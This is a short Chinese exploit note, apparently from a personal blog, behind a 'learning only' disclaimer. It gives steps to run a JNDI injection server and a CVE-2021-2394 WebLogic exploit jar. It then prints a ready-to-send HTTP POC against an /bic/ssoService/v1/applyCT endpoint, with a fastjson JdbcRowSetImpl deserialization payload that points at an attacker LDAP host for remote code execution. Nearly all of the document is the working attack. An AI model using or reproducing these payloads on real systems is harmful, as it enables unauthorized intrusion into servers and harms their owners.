chisaka

本文仅作个人学习记录，涉及技术仅供学习参考，禁止用于其他用途！！！未经授权请勿利用文章中提及的技术对任何计算机系统进行非法攻击。利用此文所提供的技术而造成的直接或间接后果和损失，均由使用者本人负责。

1、开启weblogic环境，利用cve-2020-14882的docker环境;

2、执行命令开启恶意服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C xxx -A xxx；

3、设置监听好监听开始攻击：java -jar CVE_2021_2394.jar

POC

POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/json
Content-Length: 209

{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx:1389/xxxxx","autoCommit":true},"hfe4zyyzldp":"="}